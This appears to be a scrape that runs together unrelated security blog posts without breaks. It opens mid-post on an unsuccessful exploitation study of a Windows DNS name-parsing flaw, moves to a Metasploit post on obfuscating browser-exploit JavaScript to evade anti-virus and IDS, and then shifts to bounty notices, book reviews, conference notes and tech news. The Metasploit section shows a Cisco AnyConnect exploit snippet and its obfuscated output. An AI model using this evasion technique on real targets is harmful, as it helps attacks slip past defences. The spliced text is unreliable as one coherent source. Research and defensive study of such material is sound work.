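To make that control flow easier to follow, here is a minimal C sketch of the loop structure described above. This is an illustration of the flaw, not Microsoft's actual code; the names and buffer size are invented, and the real function performs additional validation that is omitted here.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Sketch of the flawed reverse-name parsing loop: the only bounds test is an
 * equality check against the start of the buffer, and after consuming a '.'
 * the cursor is decremented a second time without re-checking. For an input
 * whose copied portion is ".0" (from ".0.in-addr.arpa"), the cursor steps
 * past the front of the buffer and keeps scanning down the stack until the
 * guard page raises the 0xc00000fd exception. */
static unsigned long reverse_name_to_addr(const char *labels)
{
    char buf[64];
    unsigned long addr = 0;
    size_t len = strlen(labels);
    char *cursor;

    if (len == 0 || len >= sizeof(buf))
        return 0;
    memcpy(buf, labels, len + 1);
    cursor = buf + len - 1;                 /* start at the last character */

    for (;;) {
        for (;;) {                          /* scan backwards for a '.' */
            if (*cursor == '.')
                break;
            if (cursor == buf) {            /* equality-only termination */
                addr = (addr << 8) | (strtoul(buf, NULL, 10) & 0xff);
                return addr;
            }
            --cursor;
        }
        *cursor = '\0';                     /* split off the label */
        addr = (addr << 8) | (strtoul(cursor + 1, NULL, 10) & 0xff);
        --cursor;                           /* second decrement: with ".0" this
                                             * moves the cursor below buf, so the
                                             * equality check above never fires */
    }
}

int main(void)
{
    /* Normal case: "4.3.2.1" (from 4.3.2.1.in-addr.arpa) prints 0x1020304. */
    printf("%#lx\n", reverse_name_to_addr("4.3.2.1"));
    /* reverse_name_to_addr(".0") would send the cursor out of bounds and
     * eventually fault; intentionally not called here. */
    return 0;
}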
Even though I managed to crash the process, I wasn’t 100% sure that this was the reason Microsoft released an update. I didn’t see anything interesting in the other changed functions. It seemed unlikely that anything good could come from this since there was no return address or function pointer on the stack before the function.
My first thought was to assume that I could control the data above the buffer on the stack. I hypothesized that I could do this via some deeper call stack that would occur in a preceding function call. Perhaps controlling this data would allow passing an input string that was longer than the function originally allowed. That would violate assumptions made by the programmers, and could lead to further corruption. So I created a WinDbg script that would put more valid-ish strings into the stack above (lower addresses) the buffer.
First I tested with the Ip4 variant, but it didn’t yield anything fun. Then, I tried some things with the Ip6 version, which writes one byte at a time for each pair of nibbles encountered (ex. “a.b.”). It will write up to 16 bytes (the size of the destination buffer passed in, likely a struct in6_addr). I double-checked and concluded that it wasn’t possible to cause a buffer overflow this way.
Although I didn’t get an awesome crash from this experiment, I found that it was possible to prevent a crash from occurring this way. In one instance, an already-used return address on the stack contained a ‘.’ character and prevented the crash. Being able to force this type of behavior is certainly advantageous, so I wrote this down for later.
Slightly disappointed with these results, I took a look at the Ip4 version’s stack frame.
Just before the data in “v_buf”, we find the pointer “v_out_ptr”. After a brief look-over, it seemed the best next step would be to try to corrupt this pointer and cause the “v_result” value to be written somewhere unexpected. If the pointer happened to contain a ‘.’ character, it would get replaced by a NUL byte. That is, if “v_out_ptr” was 0x00132e40, it would then become 0x00130040. It is possible for this to happen in one of two ways. First, we would need to find some way to control the length of preceding function calls’ stack frames (ex. via “alloca”). This is often a long, tedious path, for which not many good tools exist. The other option means crossing our fingers and hoping ASLR gives us a lucky value. I love rare cases where a mitigation contributes to exploitability!
NOTE: Although it’s not visible in the decompiler output, the “v_out_ptr” is read from the stack immediately before writing the output value. This is one of the reasons why the decompiler can be misleading when doing exploit development.
Initially, I tried a few experiments using the Ip6 version. Unfortunately, the Ip6 version has far more strict handling of the return from “strtoul”. If a zero is returned (ex. a string like “z.”), or if the value is greater than 15, the loop terminates and nothing is written. So I went to check the situation using the Ip4 version. It is a bit more lenient in that it accepts zero return values, as you can see on line 41. However, if we fail that conditional the function returns zero and no write occurs. In fact, the only way to get the Ip4 function to write to “v_out_ptr” is when “v_suffix” points at the start of the buffer (line 44). Ugh, strict constraints or impossibilities, not a good feeling.
Finally, on Saturday, I caved in and decided to reach out to Neel Mehta. As the original discoverer of the vulnerability, I figured he had a unique perspective on the issue. After exchanging several emails, Neel confirmed that I had nailed the root cause and offered several promising ideas for where to go next.
The first idea was to use TCP-based LLMNR resolution. I looked at my Windows 7 SP0 machine and it wasn’t listening on TCP port 5355. Bummer. Further googling led to an old TechNet article that states “TCP-based LLMNR messages are not supported in Windows Vista”. Even if Windows 7 supports this feature, RFC 4795 says TCP resolution is only used when the server has a reply that is too long for UDP. In this situation, similar to traditional DNS, the truncation (TC) bit is set in the flags section. Although it may be possible to construct a series of queries and/or spoofed responses in order to elicit a truncated response, this was not investigated. This could be considered an exercise for the reader, should you be so inclined.
The second idea that Neel conveyed centered around the additional registers that are pushed onto the stack in the course of the functions’ execution. Looking at the push instructions in the function shows that esi, edi, and ebx are pushed to the stack (in that order). These registers are later restored prior to returning to the calling function, “Dns_StringToDnsAddrEx”. After returning, the ebx register is checked against the value 0x17. The edi register is passed to one of the “RtlIpv6StringtoAddressEx” functions (ANSI or UNICODE). The esi register is passed as the destination argument to one of two “bzero(dst, 0x40)” calls. Unfortunately, none of this looked particularly promising.
The third idea that Neel proposed was to investigate the interaction between regular DNS queries and these functions. It turns out that the calling function is called from “DnsGetProxyInfoPrivate” which is exported along with “DnsGetProxyInformation”. We made no further effort to investigate this avenue. Perhaps another exercise for the reader :-)
With Saturday winding down, I decided to put together a quick trigger-fuzzer to test if random luck would lead to anything sexy. I ran it for an hour or so, but quickly got tired of looking at 0xc00000fd exception after 0xc00000fd exception. My hope had started to run out and my batteries needed recharging, so I crashed.
Sunday, Jon and I went back and forth discussing whether or not the issue was exploitable at all. We recapped our findings, but ultimately came to the conclusion that there was no way we could write a reliable exploit in time to qualify for the bounty. I had previously said I’d conduct a few more experiments in the debugger to see if corrupting the other stack-saved registers led to any nice crashes in the parent function. I set a breakpoint in the processing loop of each of the vulnerable functions and fired off some trigger queries. Each time the breakpoint was hit, I wrote a ‘.’ character to a byte offset in the saved register area and continued execution. Out of all 16 bytes, only one led to a different crash. This was the saved esi value, which was subsequently used in the bzero operation.
Similar to the “v_out_ptr” value, this value was a stack pointer that points to the output area of “Dns_StringToDnsAddrEx”. If it happened to contain a ‘.’ character, it would get modified to point to an address higher on the stack. This really isn’t much help since we’re already higher than any data that could affect code flow (return addresses, etc). This path seemed like a dead end. Having fulfilled my promise to try this experiment, I readied myself to admit defeat.
Prior to formally giving up on the bounty, Jon suggested I email Neel one last time to ask if he managed to obtain code execution from this vulnerability. Neel replied stating he hadn’t. He decided to stop work on the bug once Microsoft agreed that the issue should be rated Critical. He reiterated that he believes it’s possible to exploit this bug, but agreed that it was definitely more challenging than most bugs.
Although I want to believe that the bug is exploitable, I simply can’t see a way. Jon and I have folded. I would love to say this bug is unequivocally not exploitable, but as we have seen in the past this probably isn’t wise. Regardless, it seems to me, and I believe the facts show, that this bug is challenging enough that it’s not possible to write a reliable exploit leveraging it in one week.
Despite my opinion, there are still some avenues left unexplored for those who are inclined to push forward on this bug. If you wish to continue where we left off or just play with the bug, our technical notes are available and a DoS Metasploit module has been added to the tree. If you do push the analysis envelope forward on this bug, we hope you will contribute your findings back to the community. Good luck and happy exploiting to you all!
As of this writing, Metasploit has 152 browser exploits. Of those, 116 use javascript either to trigger the vulnerability or as a means to control the memory layout of the browser process [1]. Right now most of that javascript is static. That makes it easier for anti-virus and IDS folks to signature. That makes it less likely for you to get a shell.
Skape recognized this problem several years ago and added Rex::Exploitation::ObfuscateJS to address it. This first-gen obfuscator was based on substituting static strings, which requires a priori knowledge of what you want to substitute, meaning you need to take care of variable names. Changes to the code need to be reflected in the calls to obfuscate() and anything you miss will remain static. It also means that you have to ensure variable names don't end up in a string or elsewhere where they might get inadvertently smashed. To overcome these limitations, several modules employ a simple technique of using random values for javascript vars, but they lose out on string manipulations.
Enter RKelly, a pure-ruby javascript lexer and parser. Having a full parser gives us a lot more power than the previous obfuscation techniques available in the framework. For one, it gives us type information for literals, which makes string and number mangling really easy. While a particular static ROP chain might be easy to fingerprint, that same string can be easily represented numerous ways through javascript manipulations. Some of the ideas for mangling literals came from Drivesploit, with several new techniques thrown in as well. There's even a wrapper class, Rex::Exploitation::JSObfu, for dealing with it. Syntax is similar to its older cousin, but without the need for clunky lists of varnames to replace.
Here's an example from windows/browser/cisco_anyconnect_exec:
js = ::Rex::Exploitation::JSObfu.new %Q|
var x = document.createElement("object");
x.setAttribute("classid", "clsid:55963676-2F5E-4BAF-AC28-CF26AA587566");
x.url = "#{url}/#{dir}/";
|
js.obfuscate
html = "<html>\n<script>\n#{js}\n</script>\n</html>"
And the html as delivered to a browser:
<html>
<script>
var GPSweCkB = document.createElement((function () { var XoNO="ject",apoc="ob"; return apoc+XoNO })());
GPSweCkB.setAttribute((function () { var pYmx="ssid",aTIE="a",tvPA="cl"; return tvPA+aTIE+pYmx })(), (function () { var MbWt="7566",UcNA="7",PUHo="c",yFIi="6-2F5",YXvW="sid",sYCs="E-4BAF",SZBF="9",yZMK="-AC28-CF26AA",BmVk="l",AbBB="58",iRQW="636",RQLv=":55"; return PUHo+BmVk+YXvW+RQLv+SZBF+iRQW+UcNA+yFIi+sYCs+yZMK+AbBB+MbWt })());
GPSweCkB.url = String.fromCharCode(104,0164,0164,112,0x3a,0x2f,0x2f,49,50,067,056,48,0x2e,48,46,49,072,0x38,060,070,060,47,47,112,0165,0x46,0x62,0x4a,111,0146,0124,0143,0172,0x43,89,82,0x75,65,111,81,47);
</script>
</html>
Of course, this will be different for each request.
So now, a call to arms. We could use some help testing 116 browser exploits to see if javascript obfuscation is viable, and several issues make that challenging. For one, getting ahold of the vulnerable software is sometimes quite difficult. Also, in some cases where the vulnerability has very restrictive memory layout requirements, obfuscation may break the exploit.
What we need is people with old browsers and old plugins/toolbars/etc. who can set up the vulnerable targets, run the affected modules with obfuscation enabled, and report back whether the exploits still work.
If you're interested in helping out, contact me in #metasploit on FreeNode, or @egyp7 on twitter.
[1] Gathered with the following commands:
$ ls modules/exploits/*/browser/*.rb | wc -l
152
$ ls modules/exploits/*/browser/*.rb | xargs grep '<script' | wc -l
116
If you're packing to go to Black Hat, Defcon or Security B-Sides in Las Vegas, make sure you also download Metasploit 4.0 to entertain you on the plane ride. If you missed the recent announcement, check out this blog post for a list of new features.
The new version is now available for all editions, and here's how you upgrade:
$ sudo bash
# cd /opt/framework-3.x.x/msf3/
# svn update
In case you get stuck or have any questions, make sure you visit the Rapid7 Community to find answers, tips & tricks. Alternatively, just drop by our Black Hat booth #109 and ask us directly!
The Metasploit team is excited to announce a new incentive for community exploit contributions: Cash! Running until July 20th, our Exploit Bounty program will pay out $5,000 in cash awards (in the form of American Express gift cards) to any community member that submits an accepted exploit module for an item from our Top 5 or Top 25 exploit lists. This is our way of saying thanks to the open source exploit development community and encouraging folks who may not have written Metasploit modules before to give it a try.
All accepted submissions will be available under the standard Metasploit Framework license (3-clause BSD). Exploit selection is first-come, first-serve; please see the official rules for more information.
Contributors will have a chance to claim a vulnerability from the Top 25 ($100) and Top 5 ($500) lists. Once a vulnerability has been claimed the contributor will be given one week to work on a module. After a week the vulnerability will be open again to the community. Prizes will only be paid out to the first module contributor for a given vulnerability. The process of claiming a vulnerability is an attempt at limiting situations where multiple contributors submit modules for the same vulnerability. To stake a claim, send an email to bounty@metasploit.com with the name of the vulnerability from the list below. All claims will be acknowledged, so please wait until receiving the acknowledgement before starting on the exploit. Each contributor can only have one outstanding claim at a time.
If you need help with the Metasploit module format, feel free to drop by our IRC channel (#metasploit on irc.freenode.net), and take a look at some of the community documents:
Thanks and have fun!
-HD
Are you an artist? Do you possess mad ASCII art skills? Do you like the idea of having your artwork on the face of an open source project that's one of the world's largest -- the de-facto standard for penetration testing, with more than one million unique downloads per year? Then read on!
One of the first things many people likely noticed when updating to the Metasploit Framework version 4.0-testing was the new ASCII art. In addition to all the new awesome features we have been adding to Metasploit lately, we wanted to give Metasploit a new look. When version 4.0-testing first came out we had roughly 5 or 6 new banners. Slowly we have been adding to that number. Now is your chance to make your mark on the Metasploit Project.
The Metasploit team would like to encourage the talented folks from every corner of the community to join the ASCII art fun and submit your most awesome, creative banners to us. All submissions should be uploaded to Metasploit Redmine (http://dev.metasploit.com) or e-mailed to msfdev@metasploit.com. If selected, your artwork will be committed to our banner.rb file, together with the banners that we currently have:
For questions, as always, please feel free to drop by our IRC channel (#metasploit on irc.freenode.net).
APPLE-SA-2012-03-12-1 Safari 5.1.4 Safari 5.1.4 is now available and addresses the following: Safari Available for: Windows 7, Vista, XP SP2 or later Impact: Look-alike characters in a URL could be used to masquerade a website Description: The International Domain Name (IDN) support in Safari [...]
APPLE-SA-2012-03-07-3 Apple TV 5.0 Apple TV 5.0 is now available and addresses the following: Apple TV Available for: Apple TV (2nd generation) Impact: Applications that use the libresolv library may be vulnerable to an unexpected application termination or arbitrary code execution [...]
APPLE-SA-2012-03-07-2 iOS 5.1 Software Update iOS 5.1 Software Update is now available and addresses the following: CFNetwork Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: Visiting a maliciously crafted website may lead to the [...]
APPLE-SA-2012-03-07-1 iTunes 10.6 iTunes 10.6 is now available and addresses the following: WebKit Available for: Windows 7, Vista, XP SP2 or later Impact: A man-in-the-middle attack while browsing the iTunes Store via iTunes may lead to an unexpected application termination or [...]
The recent Tweet by hogfly (@4n6ir) made me ponder this question. He points to an Aviation Week story by David Fulghum, Bill Sweetman, and Amy Butler titled China's Role In JSF's Spiraling Costs. It says in part:
How much of the F-35 Joint Strike Fighter’s spiraling cost in recent years can be traced to China’s cybertheft of technology and the subsequent need to reduce the fifth-generation aircraft’s vulnerability to detection and electronic attack?
That is a central question that budget planners are asking, and their queries appear to have validity. Moreover, senior Pentagon and industry officials say other classified weapon programs are suffering from the same problem. Before the intrusions were discovered nearly three years ago, Chinese hackers actually sat in on what were supposed to have been secure, online program-progress conferences, the officials say.
The full extent of the connection is still being assessed, but there is consensus that escalating costs, reduced annual purchases and production stretch-outs are a reflection to some degree of the need for redesign of critical equipment. Examples include specialized communications and antenna arrays for stealth aircraft, as well as significant rewriting of software to protect systems vulnerable to hacking.
It is only recently that U.S. officials have started talking openly about how data losses are driving up the cost of military programs and creating operational vulnerabilities, although claims of a large impact on the Lockheed Martin JSF are drawing mixed responses from senior leaders. All the same, no one is saying there has been no impact.
While claiming ignorance of details about effects on the stealth strike aircraft program, James Clapper, director of national intelligence, says that Internet technology has “led to egregious pilfering of intellectual capital and property. The F-35 was clearly a target,” he confirms.
The point of this article is to question the impact, in business and operational terms, of the cyberwar China continues to prosecute against the West.
The toughest question in digital security is "who cares" because it is usually extremely difficult to determine the impact of an intrusion. Consider the steps required to define the business and operational impact of the theft of intellectual property (as one example -- there are many others).
Steps 1 and 2 are largely technical, but 3-6 are more business-focused. From what I have seen, everyone who is a victim in the ongoing cyberwar struggles to conduct "battle damage assessment" (BDA) for digital intrusions. Articles like the one I cited are examples showing how difficult it is to determine if anyone should care about China's exploitation of Western IP.
The Economist presents these charts for the following reason:
In the spring of 2011 the Pew Global Attitudes Survey asked thousands of people worldwide which country they thought was the leading economic power. Half of the Chinese polled reckoned that America remains number one, twice as many as said “China”. Americans are no longer sure: 43% of US respondents answered “China”; only 38% thought America was still the top dog. The answer depends on which measure you pick. (emphasis added)
The reason I like these charts is that they remind me of how many security practitioners think about "being secure." Managers often ask security staff "Are we secure?" The truth is there is no single number, so anyone selling you a "risk" number is wasting your time (and probably your money). However, it would be much more useful to display a chart like the one created by the Economist. The security staff could choose a dozen or more simple metrics to paint a picture, and let the viewer interpret the answer using his or her own emphasis and bias.
Another reason I like the Economist chart is that the magazine built it using specified assumptions of future activity, listed in the article. If you disagree with these assumptions you can visit the second link I posted to devise your own charts. Although not shown here, what would be even more useful is showing these charts as a time series, with snapshots for January, then February, and so on. This "small multiples" approach (promoted by Tufte) capitalizes on the skill of the human eye and brain to observe and compare differences in similar objects.
If you had to pick a dozen or so indicators of security for a chart, what would you depict? The two I consider non-negotiable are 1) incidents per unit time and 2) time to containment for incidents.
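As a rough illustration (my own sketch, not part of the original post), both of those metrics fall out of a simple incident log; the incidents.csv file and its column names here are hypothetical:
# Minimal sketch, assuming a hypothetical incidents.csv with
# "detected_at" and "contained_at" timestamp columns.
require 'csv'
require 'time'

incidents_per_month = Hash.new(0)   # incidents per unit time (month)
containment_hours   = []            # time to containment per incident

CSV.foreach('incidents.csv', headers: true) do |row|
  detected  = Time.parse(row['detected_at'])
  contained = Time.parse(row['contained_at'])
  incidents_per_month[detected.strftime('%Y-%m')] += 1
  containment_hours << (contained - detected) / 3600.0
end

incidents_per_month.sort.each { |month, n| puts "#{month}: #{n} incidents" }
unless containment_hours.empty?
  mean = containment_hours.reduce(:+) / containment_hours.size
  puts "Mean time to containment: #{mean.round(1)} hours"
end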
I'd like to thank the sponsors of the event, depicted on the photo of the back of the T-shirt at left. Props to whoever designed the shirt -- it's one of my favorites. The award itself looks great, and the gift certificate to the Apple store will definitely help with an iPad 3, as intended!
Long-time readers may remember that I won Best Non-Technical Blog at the same event in 2009.
Winning this award has given me a little more motivation to blog this year. I admit that communicating via Twitter as @taosecurity is much more seductive due to the presence of followers and the immediate feedback!
Speaking of Twitter, SC Magazine named @taosecurity as one of their 5 to follow, which I appreciate.
And speaking of SC Magazine, they awarded my company Mandiant their best security company award.
This is not an unbiased review. Michael W. Lucas cites my praise for two of his previous books, and mentions one of my books in his text. I've also stated many times that MWL is my favorite technical author. With that in mind, I am pleased to say that SSH Mastery is another must-have, must-read for anyone working in IT. I imagine that most of us use OpenSSH and/or PuTTY every day, but I am sure each of us will learn something about these tools and the SSH protocol after reading SSH Mastery.
If the malware authors are ready to provide the samples, the authors of the book you’re reading are here to provide the skills. Practical Malware Analysis is the sort of book I think every malware analyst should keep handy. If you’re a beginner, you’re going to read the introductory, hands-on material you need to enter the fight. If you’re an intermediate practitioner, it will take you to the next level. If you’re an advanced engineer, you’ll find those extra gems to push you even higher—and you’ll be able to say “read this fine manual” when asked questions by those whom you mentor.
Practical Malware Analysis is really two books in one—first, it’s a text showing readers how to analyze modern malware. You could have bought the book for that reason alone and benefited greatly from its instruction. However, the authors decided to go the extra mile and essentially write a second book. This additional tome could have been called Applied Malware Analysis, and it consists of the exercises, short answers, and detailed investigations presented at the end of each chapter and in Appendix C. The authors also wrote all the malware they use for examples, ensuring a rich yet safe environment for learning.
Therefore, rather than despair at the apparent asymmetries facing digital defenders, be glad that the malware in question takes the form it currently does. Armed with books like Practical Malware Analysis, you’ll have the edge you need to better detect and respond to intrusions in your enterprise or that of your clients. The authors are experts in these realms, and you will find advice extracted from the front lines, not theorized in an isolated research lab. Enjoy reading this book and know that every piece of malware you reverse-engineer and scrutinize raises the opponent’s costs by exposing his dark arts to the sunlight of knowledge.
To announce the book, the publisher is running this promotion: Use discount code REVERSEIT to get 40% off Practical Malware Analysis. One week only! Free ebook with all print book purchases.
The authors also started a new blog at practicalmalwareanalysis.com.
To spot staff with the incentive to steal (over and above the obvious fact that money is quite useful), anti-fraud software scans e-mails for evidence of money troubles...
Ernst & Young (E&Y), a consultancy, offers software that purports to show an employee’s emotional state over time: spikes in trend-lines reading “confused”, “secretive” or “angry” help investigators know whose e-mail to check, and when. Other software can help firms find potential malefactors moronic enough to gripe online, says Jean-François Legault of Deloitte, another consultancy...
Dick Oehrle, the chief linguist on the project, explains how it works. First, the algorithm digests a big bundle of e-mails to get used to employees’ language. Then human lawyers code the same e-mails, sorting things as irrelevant, relevant or serious. The human feedback and the computers’ results are then reconciled, so the system gets smarter. Mr Oehrle says the lawyers also learn from the computers (presumably such things as empathy and the difference between right and wrong).
To find employees with the opportunity to steal, the software looks for what snoops call “out of band” events: messages such as “call my mobile” or “come by my office” suggest a desire to talk without being overheard. E-mails between an employee and an outsider that contain the words “beer”, “Facebook” or “evening” can suggest a personal relationship...
Employers without such technology are “operating blind”, says Alton Sizemore, a former fraud detective at America’s FBI... [N]early all giant financial firms now run anti-fraud linguistic software, but fewer than half of medium-sized or small financial firms do...
Prospective users typically pay for a single “snapshot” search of 12 months of company records, according to APEX Analytix, a developer of the software in Greensboro, North Carolina. For a company with 10,000 employees, this costs about $45,000. Unless a company is very small, evidence of fraud almost always surfaces, convincing clients to sign up for a yearly package that costs three or four times as much as a spot-check, says John Brocar of APEX Analytix.
Why spend the money... If a company shows it has systems in place to detect this kind of thing, and starts investigating before outsiders do, it may have an easier time in court.
When I read this story it reminded me of my advice to keep CIRT and Internal Investigations separate. Notice the repeated mention of "lawyers" in the Economist story. There is no reason for this sort of technology or responsibility to reside in the Computer Incident Response Team. CIRTs should focus on external threats. Internal Investigations should focus on internal threats, e.g. employees, contractors, and other authorized parties who may perform unauthorized activities. II should collaborate closely with legal and human resources and should not use CIRT tools or techniques. This separation of duties was invaluable when I ran GE-CIRT because we could reassure constituents that our analysts focused on bad guys outside the company, not our own users.
In brief this book will tell you more about the awesome Sysinternals tools than you might have thought possible. One topic that caught my attention was using Process Monitor to summarize network activity (p 139). This reminded me of Event Tracing for Windows and Network Tracing in Windows 7. I remain interested in this capability because it can be handy for incident responders to collect network traffic on endpoints without installing new software, relying instead on native OS capabilities.
I suggest keeping a copy of this book in your team library if you run a CIRT. Thorough knowledge of the Sysinternals tools is a great benefit to anyone trying to identify compromised Windows computers.
I had one small issue with the book, and that involved its introduction to Microsoft's STRIDE model. I blogged about this years ago in Someone Please Explain Threats to Microsoft. The Web sec book says on p 36:
STRIDE is a threat classification system originally designed by Microsoft security engineers. STRIDE does not attempt to rank or prioritize vulnerabilities... instead, the purpose of STRIDE is only to classify vulnerabilities according to their potential effects. This is immensely useful information to have when threat modeling an application...
To see my critique of STRIDE, please see my linked post. Basically, STRIDE is best described as "bad stuff," and includes a mix of attacks and vulnerabilities with no real "threats."
Nevertheless, if you're looking for a compact and detail-packed exploration of Web application security, take a look at Web Application Security: A Beginner's Guide.
By the way, I've written a lot about confusing terms like "threat," "vulnerability," "risk," etc. over the years. One of my earliest posts, The Dynamic Duo Discuss Digital Risk, provides background if you are so inclined.
This is also an excellent book, although I did not read it thoroughly enough to warrant a review. On p xxix the authors note that 30% of the book is "new or extensively revised" and 70% of the book has "minor or no modifications." I was very impressed to see the authors outline changes by chapter on pages xxx-xxxii. That is not common in second editions, in my experience.
The book is very thorough and introduces technology along with attacks and defenses. Their "hack steps" sections provide a playbook for assessing Web applications. Some sections even mention logging and/or alerting -- I'd like to see more of that here and elsewhere! The book also includes end-of-chapter questions with answers posted on the book Web site, mdsec.net/wahh.
Speaking of the Web site, the authors also post source code, links to tools, and checklists, plus labs that cost $7/hour. That is a new approach I haven't seen elsewhere, but I think it's an interesting idea.
At 912 pages WAHH2E offers a ton of content written in a clear and convincing style. Great work guys. My only concern was their refusal to cite sources. That makes a real difference in my mind; give credit where credit is due in the third edition.
I did not read the whole book, hence I'm posting only my "impressions" here. I recommend reading this book if you want to know a lot, and I mean a lot, about how screwed up Web browsers, protocols, and related technologies truly are. Because many points of the book are tied to specific browser versions, I expect its shelf life to degrade a little more rapidly than some other technical titles. Still, I am shocked by the amount of research and documentation Michal performed to create The Tangled Web.
As always, Michal's content is highly readable, very detailed, and well-sourced. It's a great example for other technical authors. Great work Michal!
In brief, Network Warrior, 2nd Ed is the book to read if you are a network administrator trying to get to the next level. All of my praise from the previous review applies to the new book. The book is really that good, primarily because it combines very clear explanations with healthy doses of real-world experience. Thanks to Mr Donahue for taking the time to update his book!
Despite the passage of time, I thought HSB stood up very well. Most of the problems discussed in the book and the techniques to find them should still work today. The targets have changed somewhat (XP was the target in the book; Windows 7 would be more helpful today -- though not everywhere).
Again, this is an impression and not a review, so I only offer thoughts and not opinions or judgements on the text. From what I saw, the book appears well written with helpful diagrams and screen shots. It covers a lot of surface area and ways to exploit it.
One note for the history buffs: the foreword says:
When Jesse James, the famous outlaw of the American West, was asked why he robbed banks, he replied, "That's where the money is."
I'm sure most of you think that Willie Sutton said that, not Jesse James. According to Snopes neither of them said it:
While lore would have it that the bank robber replied "Because that's where the money is" to that common question, Sutton denied ever having said it. "The credit belongs to some enterprising reporter who apparently felt a need to fill out his copy," wrote Sutton in his autobiography. "I can't even remember where I first read it. It just seemed to appear one day, and then it was everywhere."
But back to the book -- should you buy it? If your job involves finding vulnerabilities in Windows software (and this book does have more of a Windows slant), I would take a close look at it.
I liked the following aspects of the book: integration of history, real examples, diversity of approaches, case studies, and examples. I thought the book was easy to read and well presented. Paired with more specific, newer books on finding vulnerabilities, I think Fuzzing is a winner.
My only real dislike involved the quotes by former US President George W. Bush at the start of each chapter. I thought they were irrelevant and a distraction.
These questions can be tough to answer from a purely theoretical perspective. I propose the following approach.
First, conduct a tabletop exercise where you simulate adversary actions. At each stage of the imagined attack, consider what evidence an intruder might create while taking actions against your systems. For example, if you are trying to determine how to detect and respond to an attack against a Web server, you're almost certainly going to need Web server logs. If you don't currently have access to those logs, you've just identified a gap that needs to be addressed. I recommend this sort of tabletop exercise first because you will likely identify deficiencies at low cost. Addressing them might be expensive though.
Second, conduct a technical exercise where a third party simulates adversary actions. This is not exactly a pen test but it is the sort of work a red team conducts. Ask the red team to carry out the attacks you previously imagined to determine if you can detect and respond to their activity. This should be a controlled action, not an "anything goes" event. You will see whether the evidence and processes you identified in the first step help you detect and respond to the red team activity. This step is more expensive than the previous because you are paying for red team attention, and again fixes could be expensive.
Third, you may consider re-engaging the red team to carry out a less restrictive, more imaginative adversary simulation. In this exercise the red team isn't bound by the script you devised previously. See if your improved data and processes are sufficient. If not, work with the red team to devise better detection and response so that you can handle their attacks.
At this point you should have the data and processes to deal with the majority of real-world attacks. Of course some intruders are smart and creative, but you have a chance against them now given the work you just performed.
Thank you to all publishers who sent me books in 2011. I have plenty more to read in 2012.
Congratulations to all the authors who wrote great books in 2011, and who are publishing titles in 2012!
This year I spoke at the Executive Security Action Forum on a panel moderated by PayPal CISO Michael Barrett alongside iDefense GM Rick Howard and Lockheed Martin CISO Chandra McMahon. I thought our panel offered value to the audience, as did much of the remainder of the event.
Most of the speakers and attendees (about 100 people) appeared to have accepted the message that prevention eventually fails and that modern security is more like a counterintelligence operation than an IT operation.
After ESAF (all day Monday) I divided my time among the following: speaking to visitors to the Mandiant booth, discussing security issues with reporters and industry analysts, and walking the RSA exposition floor. I also attended the Wednesday panel where one of our VPs, Grady Summers, explained how to deal with hacktivists.
Speaking of the RSA floor, I took the photo at left praising the 55 new vendors appearing at the exposition for the first time. I counted 13 I recognized as "established" companies or organizations (Airwatch, CyberMaryland, Diebold, FireHost, Fluke Networks, Global Knowledge, GoDaddy.com, Good Technology, Nexcom, PhishMe, Prolexic Technologies, Qosmos, and West Coast Labs). I didn't recognize the other 42. There were probably dozens more who were not first-time RSA vendors that I wouldn't recognize either.
I suppose there are different ways to think about this situation. A positive way would be to view these new companies as signs of innovation. However, I didn't really see much that struck me as new or innovative. For example, a company specializing in password resets doesn't really get the heart pumping.
Another point of view could be that the presence of so many new companies means venture capital is active again. I saw plenty of that at work for certain companies who I know have just rebranded, relaunched, or have been resuscitated in recent months. Several of them sported mammoth booths and plenty else. They must figure that if they have 7 or 8 figures to spend, they're going to put it into marketing!
I was in some ways overwhelmed by the number of attendees. I saw references to over 20,000 people attending RSA 2012. I believe many of them wore $100 (or even free, courtesy of vendors) "expo only" passes. With 20,000 people willing to participate in a security event, that tells me my @taosecurity Twitter follower count (over 11,000 today) has more room to grow. I would not have expected to rise much beyond 10,000 when I started Tweeting.
One of the best aspects of RSA 2012 was the Security Bloggers Meetup, which I was able to attend in person as I blogged previously.
My buzzphrase of the conference was "big data." To me, "big data" sounds like SIEM warmed over. I'll have more to say on this topic in future posts.
I'll probably return to RSA next year on behalf of my company, and again I will focus on the exposition and non-session activities. It's the only place where you can see so many security vendors in one place.
What did you think of RSA this year?
Huawei hardware won't be part of National Broadband Network, says Australia originally appeared on Engadget on Mon, 26 Mar 2012 02:43:00 EDT.
Paswall claims that she didn’t realize that she was walking into a wall of glass as she approached the store, and says that she broke her nose as a result of the collision. The Manhasset Apple Store has floor-to-ceiling glass walls at the front and rear of the store, with doors in the middle at both ends. It's a similar design to the Scottsdale Quarter and Lincoln Park stores.
Her suit claims that “the defendant was negligent ... in allowing a clear, see-through glass wall and/or door to exist without proper warning.”
How would you change the Galaxy Tab 7.0 Plus? originally appeared on Engadget on Sun, 25 Mar 2012 22:52:00 EDT.
Engadget Mobile Podcast 131 - 03.25.2012 originally appeared on Engadget on Sun, 25 Mar 2012 22:13:00 EDT.
Square's Card Case rechristened 'Pay with Square,' is first to bring geo-fenced hands-free payments to Android originally appeared on Engadget on Sun, 25 Mar 2012 21:33:00 EDT.
Software patents are hurting the world, but the damage they do is often hard to explain and see.
But Dana Nieder’s post “Goliath v. David, AAC style” has put a face on the invisible scourge of software patents. As she puts it, a software patent has put her “daughter’s voice on the line. Literally. My daughter, Maya, will turn four in May and she can’t speak.” After many tries, the parents found a solution: A simple iPad application called “Speak for Yourself” that implements “augmentative and alternative communication” (AAC). Dana Nieder said, “My kid is learning how to ‘talk.’ It’s breathtaking.”
But now Speak for Yourself is being sued by a big company, Semantic Compaction Systems and Prentke Romich Company (SCS/PRC), who claims that the smaller Speak for Yourself is infringing SCS/PRC’s patents. If SCS/PRC wins their case, the likely outcome is that these small apps will completely disappear, eliminating the voice of countless children. The reason is simple: Money. SCS/PRC can make $9,000 by selling one of their devices, so they have every incentive to eliminate software applications that cost only a few hundred dollars. Maya cannot even use the $9,000 device, and even if she could, it would be an incredible hardship on a Bronx family living on a single 6th-grade math teacher's income. In short, if SCS/PRC wins, they will take away the voice of this little girl, who is not yet even four, as well as countless others.
